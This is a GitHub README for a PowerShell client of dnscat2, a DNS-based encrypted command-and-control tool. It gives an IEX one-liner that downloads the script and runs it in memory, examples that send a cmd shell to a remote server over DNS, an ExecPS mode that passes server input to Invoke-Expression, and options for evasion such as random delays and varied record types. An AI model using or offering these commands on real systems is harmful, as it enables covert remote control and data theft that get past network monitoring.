A Powershell client for dnscat2, an encrypted DNS command and control tool.
Switch branches/tags
Nothing to show
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md Update README.md Aug 7, 2017
dnscat2.ps1 Whitespace removed, useless option removed Jul 20, 2018

README.md

- The upload and download functions inside the command session only work consistently with small files.
- Please use the original executable client if you require larger file transfers.

dnscat2 is a DNS covert channel tool by @iagox86 (Ron Bowes) which is used to transfer data over DNS requests.

This is a powershell version of the dnscat2 C client.

Click here for a blog post that gives a more detailed breakdown of the purpose of this script, and how to use it.

To use this script, you'll need the ruby dnscat2 server. Make sure to add the --no-cache option when running the server. This client is incompatible with the server's caching.

Setup

First, install the dnscat2 server. Start the server with caching disabled using --no-cache. The command to start your server should look something like this: ruby dnscat2.rb --dns="domain=example.com" --no-cache

Next, launch Windows Powershell (version 2.0 or later). You can use this command to load the dnscat2 powershell functions:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

Examples

Start-Dnscat2 is the actual function used as the client. Specifiy the dnscat2 server using -Domain.

Start a command session, and send DNS requests to 8.8.8.8 on port 53:
    Start-Dnscat2 -Domain <dnscat2 server> -DNSServer 8.8.8.8

Send a cmd shell, and send DNS requests to the default DNS Server set in Windows:
    Start-Dnscat2 -Domain <dnscat2 server> -Exec cmd

Start a console session. Only use CNAME, MX, and AAAA requests:
    Start-Dnscat2 -Domain <dnscat2 server> -LookupTypes @("CNAME","MX","AAAA") -Console

Do not encrypt the session. Encryption is enabled by default.
    Start-Dnscat2 -Domain <dnscat2 server> -NoEncryption

Powershell Command Session Commands

The client can handle normal dnscat2 commands, or the powershell version of that command. To use the powershell version of a command, set specific parameters the client will detect (These are commands run from a command session on the server):

Start a new session which simulates a Powershell shell, like ExecPS:
    exec psh

Upload app.exe on the server into a hex string stored in the $app powershell variable:
    upload app.exe hex:$app

Download the byte array stored in the $app powershell variable to app.exe on the server:
    download bytes:$app app.exe

Start-Dnscat2

-Domain <String>          The Domain being used by the dnscat2 server.
-DNSServer <String>       The hostname or IP Address to send DNS queries to. (Default: Set by Windows)
-DNSPort <Int32>          The port to send DNS queries to. (Default: 53)

-Command                  Start a command session. (Default)
-Exec <String>            Link the I/O of a process with the Dnscat2 session.
-Console                  Link the I/O of the console with the Dnscat2 session.
-ExecPS                   Simulate a Powershell session and link the IO with the Dnscat2 session.
                          WARNING: Exiting will kill the entire dnscat2 client, not just the session.

-PreSharedSecret          Set the same secret on the server to authenticate and prevent MITM.
-NoEncryption             Do not use encryption.

-LookupTypes <String[]>   Set an array of lookup types to randomly switch between.
                          Only TXT, MX, CNAME, A, and AAAA records are supported. Default: @(TXT, MX, CNAME)
-Delay <Int32>            Set a delay between each request, in milliseconds. (Default: 0)
-MaxRandomDelay <Int32>   Set the max value of a random delay added to the normal delay, in milliseconds. (Default: 0)
-MaxPacketSize <Int32>    Maximum length of a dnscat2 packet. (Default: 240)
-Name <String>            The name of your dnscat2 session. (Default: hostname)

ExecPS and 'exec psh'

dnscat2-powershell simulates a powershell session by passing data from the server to Invoke-Expression. Only stdout is returned, and variables are preserved as long as the client is running. Watch out for things that exit powershell like "exit" and "break", because the entire dnscat2-powershell client will exit, not just the ExecPS session.

Other Credits